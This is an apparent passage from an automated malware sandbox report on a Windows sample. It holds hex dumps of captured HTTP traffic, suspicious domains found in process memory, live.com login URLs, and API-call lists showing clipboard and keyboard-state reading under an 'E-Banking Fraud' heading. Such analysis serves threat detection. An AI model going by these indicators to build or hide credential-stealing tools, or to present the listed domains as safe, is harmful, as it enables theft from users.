0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:30:00 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:30:03 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:30:36 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15190Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 5c cc 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd 67 df fc f0 ee a7 ff fe e7 6f 49 6a 33 71 7b 76 e3 7e 88 60 32 99 34 72 4b ff fc 53 c3 c5 80 45 b7 67 6f 6e 32 b0 8c 84 29 d3 06 ec a4 f1 d7 9f be a3 57 0d d2 5d df 48 96 c1 a4 31 e5 30 cb 95 b6 0d 12 2a 69 41 62 e6 8c 47 36 9d 44 30 e5 21 d0 f2 a5 4d b8 e4 96 33 41 4d c8 04 4c 7a 25 ce 16 cc b9 56 81 b2 e6 7c 0d 72 9e b1 7b ca 33 96 00 cd 35 b8 26 be 60 3a 81 f3 8a 80 b1 73 01 b7 3c 4b 7c 6e 9a 3f 1b fe 11 cc a4 c1 0a ab 1a 84 ff da 26 55 e4 ff ac 42 6d 17 6b 91 45 89 cd b8 a4 5c 5a cd a5 e1 21 75 69 3e 19 78 9e 97 df 93 de a8 fc 79 b8 e9 56 e8 d8 c6 72 8b 87 3f ff f6 af 09 97 c8 f4 b7 ff a5 08 48 07 a3 59 c4 6e ba d5 f5 d9 8d e0 f2 8e 68 10 93 f3 48 1a c7 37 06 1b a6 e7 24 c5 d3 e4 bc db 0d 84 52 51 c0 50 e6 10 42 96 9b 8e 49 55 5e 4e b2 29 6d 30 61 41 4b 66 a1 41 ec 3c 47 65 59 9e 0b 1e 32 cb 95 ec 6a 63 7e 77 9f 09 bc 72 2d 27 0d f2 85 66 7f 2b d4 98 7c 07 10 35 aa 46 8d d4 da dc f8 07 da 75 63 cc ec 36 5e ad 29 89 00 05 cd 70 57 bf fd ab e6 ca 9c 46 02 2b 5c 89 d9 66 63 42 cd 73 7b 7b 36 e3 32 52 b3 ce fb 59 0e 99 fa c0 7f 04 6b b9 4c 0c 99 90 45 23 60 06 fe aa 45 c3 5f e2 ff d2 fd a5 6b 3a b3 8e d2 c9 2f dd d2 26 e6 17 04 d7 f0 4b b7 2c fe a5 db 1b 75 bc ce e0 97 ee 65 ff fe b2 ff 4b b7 d1 6e c0 bd c5 fa 4e 2e 13 7c 31 d3 e4 65 78 58 58 a2 e1 ef b7 15 20 9e dc bb 2a 74 08 0d 7f d1 40 7f a0 80 65 d9 12 bf 84 af 15 e4 97 ee 2c 47 3f 86 a2 88 5c c7 0f a6 0c 94 b5 14 17 04 38 76 27 e3 b2 f3 c1 fc 7e 0a 7a 72 d1 b9 ec f4 1a 0f 0f e3 b3 ee 97 9f 91 9f 52 6e 48 cc 05 10 fc 75 4e a7 09 48 d0 d8 3b 22 5f 76 cf 3e 8b 0b 19 ba 45 36 79 5b b6 16 53 a6 89 6a 9b 36 8c 57 71 12 36 a1 b5 b0 7a 5e de d9 c9 c2 14 79 ae b4 fd 09 8c 35 3e b4 2d cf f0 c4 b2 dc 6f 4a 98 91 6f 10 b8 d5 99 32 51 c0 0f 71 b3 f5 30 36 60 0c c2 fc 68 95 46 c1 3a 06 ec f7 38 76 53 b5 ff cb 8f 3f fc 53 c7 58 8d eb e3 f1 bc 69 5b ad 07 54 24 4c 5d bb 87 87 75 fb bc 89 3d 1c 35 e8 84 38 aa fe 0b 84 b6 e9 b5 bd 36 be 33 39 65 b8 10 1e d9 74 f3 9a 02 4f 52 db c2 00 4e 2d 7e c2 85 36 2d a6 7b ad 71 35 80 63 f9 57 2e ed a0 ff 95 d6 6c de 84 4e 82 9c dc 36 91 3b 3b 05 ba 13 61 62 Data Ascii: ]F%+\#W|RRfZuJ9x gi9fAkgoIj3q{v~`24rKSEgon2)W]H10*
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:30:39 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15190Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 5c cc 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd 67 df fc f0 ee a7 ff fe e7 6f 49 6a 33 71 7b 76 e3 7e 88 60 32 99 34 72 4b ff fc 53 c3 c5 80 45 b7 67 6f 6e 32 b0 8c 84 29 d3 06 ec a4 f1 d7 9f be a3 57 0d d2 5d df 48 96 c1 a4 31 e5 30 cb 95 b6 0d 12 2a 69 41 62 e6 8c 47 36 9d 44 30 e5 21 d0 f2 a5 4d b8 e4 96 33 41 4d c8 04 4c 7a 25 ce 16 cc b9 56 81 b2 e6 7c 0d 72 9e b1 7b ca 33 96 00 cd 35 b8 26 be 60 3a 81 f3 8a 80 b1 73 01 b7 3c 4b 7c 6e 9a 3f 1b fe 11 cc a4 c1 0a ab 1a 84 ff da 26 55 e4 ff ac 42 6d 17 6b 91 45 89 cd b8 a4 5c 5a cd a5 e1 21 75 69 3e 19 78 9e 97 df 93 de a8 fc 79 b8 e9 56 e8 d8 c6 72 8b 87 3f ff f6 af 09 97 c8 f4 b7 ff a5 08 48 07 a3 59 c4 6e ba d5 f5 d9 8d e0 f2 8e 68 10 93 f3 48 1a c7 37 06 1b a6 e7 24 c5 d3 e4 bc db 0d 84 52 51 c0 50 e6 10 42 96 9b 8e 49 55 5e 4e b2 29 6d 30 61 41 4b 66 a1 41 ec 3c 47 65 59 9e 0b 1e 32 cb 95 ec 6a 63 7e 77 9f 09 bc 72 2d 27 0d f2 85 66 7f 2b d4 98 7c 07 10 35 aa 46 8d d4 da dc f8 07 da 75 63 cc ec 36 5e ad 29 89 00 05 cd 70 57 bf fd ab e6 ca 9c 46 02 2b 5c 89 d9 66 63 42 cd 73 7b 7b 36 e3 32 52 b3 ce fb 59 0e 99 fa c0 7f 04 6b b9 4c 0c 99 90 45 23 60 06 fe aa 45 c3 5f e2 ff d2 fd a5 6b 3a b3 8e d2 c9 2f dd d2 26 e6 17 04 d7 f0 4b b7 2c fe a5 db 1b 75 bc ce e0 97 ee 65 ff fe b2 ff 4b b7 d1 6e c0 bd c5 fa 4e 2e 13 7c 31 d3 e4 65 78 58 58 a2 e1 ef b7 15 20 9e dc bb 2a 74 08 0d 7f d1 40 7f a0 80 65 d9 12 bf 84 af 15 e4 97 ee 2c 47 3f 86 a2 88 5c c7 0f a6 0c 94 b5 14 17 04 38 76 27 e3 b2 f3 c1 fc 7e 0a 7a 72 d1 b9 ec f4 1a 0f 0f e3 b3 ee 97 9f 91 9f 52 6e 48 cc 05 10 fc 75 4e a7 09 48 d0 d8 3b 22 5f 76 cf 3e 8b 0b 19 ba 45 36 79 5b b6 16 53 a6 89 6a 9b 36 8c 57 71 12 36 a1 b5 b0 7a 5e de d9 c9 c2 14 79 ae b4 fd 09 8c 35 3e b4 2d cf f0 c4 b2 dc 6f 4a 98 91 6f 10 b8 d5 99 32 51 c0 0f 71 b3 f5 30 36 60 0c c2 fc 68 95 46 c1 3a 06 ec f7 38 76 53 b5 ff cb 8f 3f fc 53 c7 58 8d eb e3 f1 bc 69 5b ad 07 54 24 4c 5d bb 87 87 75 fb bc 89 3d 1c 35 e8 84 38 aa fe 0b 84 b6 e9 b5 bd 36 be 33 39 65 b8 10 1e d9 74 f3 9a 02 4f 52 db c2 00 4e 2d 7e c2 85 36 2d a6 7b ad 71 35 80 63 f9 57 2e ed a0 ff 95 d6 6c de 84 4e 82 9c dc 36 91 3b 3b 05 ba 13 61 62 Data Ascii: ]F%+\#W|RRfZuJ9x gi9fAkgoIj3q{v~`24rKSEgon2)W]H10*
                Source: mobsync.exe, 00000006.00000002.3901773244.00000000055B6000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000002DB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://aballanet.cat/6xrr/?DzLTc=HxJAUmNG5a
                Source: WafZCahkNS.exe, 00000008.00000002.3900807992.00000000022D2000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bloodbalancecaps.shop
                Source: WafZCahkNS.exe, 00000008.00000002.3900807992.00000000022D2000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bloodbalancecaps.shop/r9qi/
                Source: mobsync.exe, 00000006.00000002.3901773244.00000000058DA000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.00000000030DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.canadavinreport.site/g3h7/?DzLTc=dyqW
                Source: mobsync.exe, 00000006.00000002.3901773244.0000000005424000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000002C24000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1965350475.0000000000BD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
                Source: WafZCahkNS.exe, 00000008.00000002.3901668653.0000000002F48000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/0mwe/?DzLTc=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY
                Source: mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: mobsync.exe, 00000006.00000002.3901773244.0000000006246000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003A46000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: mobsync.exe, 00000006.00000002.3901773244.0000000005D90000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003590000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://down-sz.trafficmanager.net/?hh=
                Source: mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003BD8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://keyq.top/$
                Source: mobsync.exe, 00000006.00000002.3899096271.0000000002E43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: mobsync.exe, 00000006.00000002.3899096271.0000000002E43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: mobsync.exe, 00000006.00000003.1854871931.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: mobsync.exe, 00000006.00000002.3899096271.0000000002E43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: mobsync.exe, 00000006.00000002.3899096271.0000000002E43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033y7
                Source: mobsync.exe, 00000006.00000002.3899096271.0000000002E43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033K
                Source: mobsync.exe, 00000006.00000002.3899096271.0000000002E43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: mobsync.exe, 00000006.00000002.3899096271.0000000002E43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: mobsync.exe, 00000006.00000002.3904569653.0000000007820000.00000004.00000800.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3901773244.00000000063D8000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003BD8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://playchill.top/api/axgames/request?domain=$
                Source: mobsync.exe, 00000006.00000002.3904569653.0000000007820000.00000004.00000800.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3901773244.00000000063D8000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003BD8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
                Source: mobsync.exe, 00000006.00000002.3901773244.000000000656A000.00000004.10000000.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.0000000003D6A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.cstrategy.online/zz3m/?DzLTc=p4da2npHVYx4RJTvd9az3TD7
                Source: mobsync.exe, 00000006.00000002.3904689908.0000000007ACB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_00406B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00406B0C
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_00406D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00406D07
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_00406B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00406B0C
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003F2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_003F2B37
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_0041F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0041F7FF

                E-Banking Fraud

